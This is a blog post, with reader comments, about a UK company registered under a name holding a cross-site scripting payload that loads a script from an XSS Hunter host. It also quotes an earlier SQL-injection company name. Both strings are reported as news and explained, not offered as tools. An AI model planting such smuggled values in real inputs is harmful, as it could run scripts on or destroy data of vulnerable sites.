The return of Bobby Tables, LLC

The company is now legally known as "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD".

He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.

The original name of the company was ""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD". By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

Similar names have been registered in the past, such as "; DROP TABLE "COMPANIES";-- LTD", a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply "Company name available on request". [...]

He did not realise it would be an issue, he said, because characters including > and " are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.

A Companies House spokesperson [lied]: "A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites."

I love that they called it a "chevron".

Chevron 1 was, apparently, not encoded.

Previously.

Tags: , , , , , ,

4 Responses:

  1. Flotsam says:

    I love that they called it a "chevron"

    It's the Guardian. It took most of their sub-eds and journalists 20 years to learn the difference between the Net and the Web.

    • tfb says:

      What is the right name for it? I call it 'right angle bracket' I think. 'Greater-than-sign' is identical in ASCII but semantically different.

      (I'm not suggesting 'chevron' is right, just that I've realised I don't know what really is right.)

  2. Kyzer says:

    "Chevron" describes a V-shaped symbol. I think the term might be used in typography, e.g. "a right angle bracket is a right pointing chevron", but I've only ever heard them called "angle brackets" in computing.

    Angle brackets in maths are ⟨⟩ (U+2329 / U+232A), but they're not on normal computer keyboards, so the similarly shaped <> (U+003C / U+003D) became the de-facto angle brackets in programming and markup languages.

  3. mattl says:

    Yeah, the British call them chevrons for some reason. But we have a song about it.

    https://halfmanhalfbiscuit.uk/four-lads-who-shook-the-wirral-1998/keeping-chevrons/

Leave a Reply

Your email address will not be published. But if you provide a fake email address, I will likely assume that you are a troll, and not publish your comment.

You may use these HTML tags and attributes: <a href="" title=""> <b> <blockquote cite=""> <code> <em> <i> <s> <strike> <strong> <img src="" width="" height="" style=""> <iframe src="" class=""> <video src="" class="" controls="" loop="" muted="" autoplay="" playsinline=""> <div class=""> <blink> <tt> <u>, or *italics*.

  • Previously